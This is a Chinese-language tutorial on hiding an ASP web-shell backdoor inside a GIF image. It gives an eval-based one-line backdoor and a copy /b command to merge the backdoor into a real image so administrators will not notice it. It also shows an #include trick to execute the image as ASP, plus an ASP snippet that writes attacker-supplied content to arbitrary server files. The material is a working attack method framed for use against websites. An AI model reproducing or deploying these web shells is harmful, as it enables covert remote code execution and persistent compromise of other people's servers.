一個網站里面除了asp文件,再就數圖片文件最多了,它讓我們的網頁"美麗動人"嘻嘻,但是你有沒有想到過這里面暗藏的殺機,圖片也可以是asp木馬。 一個網站里面除了asp文件,再就數圖片文件最多了,它讓我們的網頁"美麗動人"嘻嘻,但是你有沒有想到過這里面暗藏的殺機,圖片也可以是asp木馬。 asp木馬已經出現很長時間了,種類也越來越多,但是說到隱蔽性,我們紅魂老大寫的--冰狐浪子asp 后門還是我眾馬中的首選,現在我們就把它作成圖片asp木馬。 首先我們把冰狐浪子asp木馬服務端直接該后綴名為gif,記得用容錯格式: <SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT> 一、include給我們指路 接下來要使用include指令,這個指令也是我們常常看到的,但是它有一個很特別的功能,可能你就沒有用到過了。這就是可以調用位於其它文件中的函數,不管它的后綴名是什么,哪怕是個圖片文件。 然后我們新建一個asp文件,在里面寫入<!--#include file="asp.gif"-->,當然你也可以把它插入到任何asp文件的頭部或者尾部,僅僅就這一句話。asp.gif就是冰狐浪子asp木馬服務端,也是一句話,這個圖片asp木馬就做好了。 不過這里還有一個小問題,雖然網站里圖片很多,但如果管理員不小心打開這個圖片,在IE上顯示的是一把小紅叉,他會怎么想呢? 為了不讓人懷疑,要讓我們的圖片美人動起來,讓它成為真正的gif文件! 二、copy給我們加油 把asp.gif改名為asp.asp,然后去找個圖片來,至於什么內容的圖片,就看你自己的愛好啦,不過最好不要超過20kb,大了執行的速度就慢,把它保存為1.gif。 再啟動windows下的dos窗口,鍵入copy 1.gif /b + asp.asp /a asp.gif 其中參數/b 是指定以二進制格式復制、合並文件。參數/a 是指定以ascll格式復制、合並文件。這里要注意文件的順序。執行完后就會生成asp.gif,這就是我們的冰狐浪子asp木馬服務端。不過現在它已經偽裝成一個婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,請插入下面代碼 <% on error resume next id=request("id") if request("id")=1 then testfile=Request.form("name") msg=Request.form("message") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg& "") thisfile.close set fs = nothing %> <form method="POST" ACTION="你插入文件的文件名?id=1"> <!--#include file="UploadFile/asp.gif"--> <% end if %>